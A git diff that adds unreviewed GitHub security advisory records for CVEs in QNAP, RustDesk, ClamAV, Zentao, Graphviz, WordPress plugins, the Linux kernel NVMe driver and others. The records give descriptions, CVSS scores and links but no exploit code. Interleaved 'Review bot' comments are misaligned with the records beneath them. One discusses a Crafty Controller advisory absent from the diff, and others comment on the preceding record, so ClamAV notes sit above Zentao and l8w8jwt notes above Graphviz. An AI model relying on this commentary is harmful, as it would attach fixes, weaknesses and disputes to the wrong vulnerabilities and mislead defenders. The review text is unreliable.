\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x96x-gwv6-4324/GHSA-x96x-gwv6-4324.json b/advisories/unreviewed/2024/02/GHSA-x96x-gwv6-4324/GHSA-x96x-gwv6-4324.json
new file mode 100644
index 0000000000000..0b14f18d41bff
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x96x-gwv6-4324/GHSA-x96x-gwv6-4324.json
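Review bot: `details` names no affected or fixed version of Crafty Controller at all ("in the HTTP handler component of Crafty Controller allows …"), and `affected` is empty, so a reader cannot tell whether any release is safe; the linked GitLab issue is the only place that information might live. The sentence also lacks a terminating period, which is trivial but visible on the rendered page. A curator should add the affected range once the upstream issue states it, or note explicitly that the range is unknown.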
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x96x-gwv6-4324",
+ "modified": "2024-02-02T18:30:30Z",
+ "published": "2024-02-02T18:30:30Z",
+ "aliases": [
+ "CVE-2023-39297"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39297"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-30"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xc8c-3cmg-p9qr/GHSA-xc8c-3cmg-p9qr.json b/advisories/unreviewed/2024/02/GHSA-xc8c-3cmg-p9qr/GHSA-xc8c-3cmg-p9qr.json
new file mode 100644
index 0000000000000..9d8777a7dc5be
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xc8c-3cmg-p9qr/GHSA-xc8c-3cmg-p9qr.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xc8c-3cmg-p9qr",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2024-25140"
+ ],
+ "details": "A default installation of RustDesk 1.2.3 on Windows places a WDKTestCert certificate under Trusted Root Certification Authorities with Enhanced Key Usage of Code Signing (1.3.6.1.5.5.7.3.3), valid from 2023 until 2033. This is potentially unwanted, e.g., because there is no public documentation of security measures for the private key, and arbitrary software could be signed if the private key were to be compromised. NOTE: the vendor's position is \"we do not have EV cert, so we use test cert as a workaround.\" Insertion into Trusted Root Certification Authorities was the originally intended behavior, and the UI ensured that the certificate installation step (checked by default) was visible to the user before proceeding with the product installation.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25140"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rustdesk/rustdesk/discussions/6444"
+ },
+ {
+ "type": "WEB",
+ "url": "https://news.ycombinator.com/item?id=39256493"
+ },
+ {
+ "type": "WEB",
+ "url": "https://serverfault.com/questions/837994"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T09:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json b/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json
new file mode 100644
index 0000000000000..438a17953f945
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json
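Review bot: The `details` text carries the vendor's dispute ("NOTE: the vendor's position is …") inline, but nothing structured in the record marks it as disputed, so consumers that only read `severity`/`cwe_ids` see an ordinary unscored entry; if the database has a convention for disputed CVEs it should be applied here, and if not, the vendor's `discussions/6444` reference should be the one a reader is steered to first. The security-relevant fact for defenders is the one `details` already states — a test code-signing root is installed by default — and the remediation (review Trusted Root stores for `WDKTestCert` and remove it where not wanted) is worth a `"type": "WEB"` pointer to the vendor discussion being tagged as such rather than mixed with a news-aggregator and a Server Fault link of equal weight.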
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xc99-434w-j882",
+ "modified": "2024-02-02T00:31:27Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2023-49610"
+ ],
+ "details": "\n\n\n\n\n\n\n\n\n\n\nMachineSense FeverWarn Raspberry Pi-based devices lack input sanitization, which could allow an attacker on an adjacent network to send a message running commands or could overflow the stack.\n\n\n\n\n\n\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49610"
+ },
+ {
+ "type": "WEB",
+ "url": "https://machinesense.com/pages/about-machinesense"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json b/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json
new file mode 100644
index 0000000000000..0866f87c38729
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xcg4-rx98-2f6x",
+ "modified": "2024-02-07T03:30:32Z",
+ "published": "2024-02-07T03:30:32Z",
+ "aliases": [
+ "CVE-2024-24019"
+ ],
+ "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/roleDataPerm/list",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24019"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24019.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xcpx-h22f-m42v/GHSA-xcpx-h22f-m42v.json b/advisories/unreviewed/2024/02/GHSA-xcpx-h22f-m42v/GHSA-xcpx-h22f-m42v.json
new file mode 100644
index 0000000000000..91a174d916e56
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xcpx-h22f-m42v/GHSA-xcpx-h22f-m42v.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xcpx-h22f-m42v",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2024-20290"
+ ],
+ "details": "A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.\n\n This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources.\n\n For a description of this vulnerability, see the ClamAV blog .",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20290"
+ },
+ {
+ "type": "WEB",
+ "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-hDffu6t"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-126"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xf6f-94pc-55vc/GHSA-xf6f-94pc-55vc.json b/advisories/unreviewed/2024/02/GHSA-xf6f-94pc-55vc/GHSA-xf6f-94pc-55vc.json
new file mode 100644
index 0000000000000..67b613c245e92
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xf6f-94pc-55vc/GHSA-xf6f-94pc-55vc.json
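Review bot: The description ends with `see the ClamAV blog .`, a sentence whose hyperlink was evidently dropped when the text was imported, leaving a dangling pointer and a stray space before the period. Either add the blog post as a `"type": "WEB"` entry in `references` so the pointer resolves, or drop the trailing sentence; the Cisco advisory already listed presumably links to it. The `CWE-126` classification is consistent with the heap buffer over-read the description names.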
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xf6f-94pc-55vc",
+ "modified": "2024-02-08T06:30:24Z",
+ "published": "2024-02-08T06:30:24Z",
+ "aliases": [
+ "CVE-2024-24216"
+ ],
+ "details": "Zentao v18.0 to v18.10 was discovered to contain a remote code execution (RCE) vulnerability via the checkConnection method of /app/zentao/module/repo/model.php.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24216"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/easysoft/zentaopms/issues/133"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/l3s10n/ZenTaoPMS_RCE"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T06:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xf9p-vpmr-grq4/GHSA-xf9p-vpmr-grq4.json b/advisories/unreviewed/2024/02/GHSA-xf9p-vpmr-grq4/GHSA-xf9p-vpmr-grq4.json
new file mode 100644
index 0000000000000..2a143bfa042e0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xf9p-vpmr-grq4/GHSA-xf9p-vpmr-grq4.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xf9p-vpmr-grq4",
+ "modified": "2024-02-04T03:30:23Z",
+ "published": "2024-02-04T03:30:23Z",
+ "aliases": [
+ "CVE-2023-33851"
+ ],
+ "details": "IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could reveal sensitive partition data to a system administrator. IBM X-Force ID: 257135.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33851"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/257135"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7114491"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T01:15:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xp6q-36fr-27p3/GHSA-xp6q-36fr-27p3.json b/advisories/unreviewed/2024/02/GHSA-xp6q-36fr-27p3/GHSA-xp6q-36fr-27p3.json
new file mode 100644
index 0000000000000..d287a47f10de3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xp6q-36fr-27p3/GHSA-xp6q-36fr-27p3.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xp6q-36fr-27p3",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6807"
+ ],
+ "details": "The GeneratePress Premium plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom meta output in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6807"
+ },
+ {
+ "type": "WEB",
+ "url": "https://generatepress.com/category/changelog/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9dcd48b8-ec9e-44b4-b531-95940adbd100?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xp9v-mj73-x58r/GHSA-xp9v-mj73-x58r.json b/advisories/unreviewed/2024/02/GHSA-xp9v-mj73-x58r/GHSA-xp9v-mj73-x58r.json
new file mode 100644
index 0000000000000..e197bfa0fc2f8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xp9v-mj73-x58r/GHSA-xp9v-mj73-x58r.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xp9v-mj73-x58r",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43519"
+ ],
+ "details": "Memory corruption in video while parsing the Videoinfo, when the size of atom is greater than the videoinfo size.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43519"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xpmf-hwm7-p279/GHSA-xpmf-hwm7-p279.json b/advisories/unreviewed/2024/02/GHSA-xpmf-hwm7-p279/GHSA-xpmf-hwm7-p279.json
new file mode 100644
index 0000000000000..7b84ba3dbf815
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xpmf-hwm7-p279/GHSA-xpmf-hwm7-p279.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xpmf-hwm7-p279",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-08T18:30:39Z",
+ "aliases": [
+ "CVE-2024-25190"
+ ],
+ "details": "l8w8jwt 2.2.1 uses memcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25190"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/GlitchedPolygons%3Al8w8jwt.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T17:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xpmp-64jj-f5gg/GHSA-xpmp-64jj-f5gg.json b/advisories/unreviewed/2024/02/GHSA-xpmp-64jj-f5gg/GHSA-xpmp-64jj-f5gg.json
new file mode 100644
index 0000000000000..98c8f68f8e11f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xpmp-64jj-f5gg/GHSA-xpmp-64jj-f5gg.json
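Review bot: `database_specific.cwe_ids` is empty even though the description identifies the weakness precisely: a non-constant-time `memcmp` used to verify an authentication value, which is CWE-208 (Observable Timing Discrepancy); `"cwe_ids": ["CWE-208"]` would make the record discoverable to consumers that filter on weakness class. The empty top-level `severity` and null `database_specific.severity` presumably await NVD scoring. The only reference besides NVD is a CVE request document in a personal repository rather than an upstream fix or release, which is worth flagging for the reviewed pass.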
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xpmp-64jj-f5gg",
+ "modified": "2024-02-02T06:30:31Z",
+ "published": "2024-02-02T06:30:31Z",
+ "aliases": [
+ "CVE-2023-46045"
+ ],
+ "details": "Graphviz 2.36 before 10.0.0 has an out-of-bounds read via a crafted config6a file. NOTE: exploitability may be uncommon because this file is typically owned by root.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46045"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/graphviz/graphviz/-/issues/2441"
+ },
+ {
+ "type": "WEB",
+ "url": "https://seclists.org/fulldisclosure/2024/Jan/73"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.openwall.com/lists/oss-security/2024/02/01/2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xq9r-2r42-w9c6/GHSA-xq9r-2r42-w9c6.json b/advisories/unreviewed/2024/02/GHSA-xq9r-2r42-w9c6/GHSA-xq9r-2r42-w9c6.json
new file mode 100644
index 0000000000000..418afba5ed357
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xq9r-2r42-w9c6/GHSA-xq9r-2r42-w9c6.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xq9r-2r42-w9c6",
+ "modified": "2024-02-01T12:30:23Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51689"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in naa986 Easy Video Player allows Stored XSS.This issue affects Easy Video Player: from n/a through 1.2.2.10.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51689"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/easy-video-player/wordpress-easy-video-player-plugin-1-2-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json b/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json
new file mode 100644
index 0000000000000..225b0c8fe324c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xqc9-88mp-rfhw",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-06T21:30:26Z",
+ "aliases": [
+ "CVE-2024-22241"
+ ],
+ "details": "Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges can inject a malicious payload into the login banner and takeover the user account.   ",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22241"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T20:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xrq6-qp2x-fh89/GHSA-xrq6-qp2x-fh89.json b/advisories/unreviewed/2024/02/GHSA-xrq6-qp2x-fh89/GHSA-xrq6-qp2x-fh89.json
new file mode 100644
index 0000000000000..5199b46d9baa8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xrq6-qp2x-fh89/GHSA-xrq6-qp2x-fh89.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xrq6-qp2x-fh89",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0630"
+ ],
+ "details": "The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0630"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xvvv-2v53-5hxv/GHSA-xvvv-2v53-5hxv.json b/advisories/unreviewed/2024/02/GHSA-xvvv-2v53-5hxv/GHSA-xvvv-2v53-5hxv.json
new file mode 100644
index 0000000000000..bc1adeabae263
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xvvv-2v53-5hxv/GHSA-xvvv-2v53-5hxv.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xvvv-2v53-5hxv",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43522"
+ ],
+ "details": "Transient DOS while key unwrapping process, when the given encrypted key is empty or NULL.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43522"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xw3g-x45j-xxhh/GHSA-xw3g-x45j-xxhh.json b/advisories/unreviewed/2024/02/GHSA-xw3g-x45j-xxhh/GHSA-xw3g-x45j-xxhh.json
new file mode 100644
index 0000000000000..98b67dc3d8b14
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xw3g-x45j-xxhh/GHSA-xw3g-x45j-xxhh.json
@@ -0,0 +1,54 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xw3g-x45j-xxhh",
+ "modified": "2024-02-07T21:30:27Z",
+ "published": "2024-02-07T21:30:27Z",
+ "aliases": [
+ "CVE-2023-6536"
+ ],
+ "details": "A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6536"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0723"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0724"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0725"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-6536"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254052"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xwmx-qhv2-jx64/GHSA-xwmx-qhv2-jx64.json b/advisories/unreviewed/2024/02/GHSA-xwmx-qhv2-jx64/GHSA-xwmx-qhv2-jx64.json
new file mode 100644
index 0000000000000..30014325b1629
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xwmx-qhv2-jx64/GHSA-xwmx-qhv2-jx64.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xwmx-qhv2-jx64",
+ "modified": "2024-02-08T00:32:19Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2024-24267"
+ ],
+ "details": "gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24267"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_3.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-401"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T18:15:52Z"
+ }
+}
\ No newline at end of file
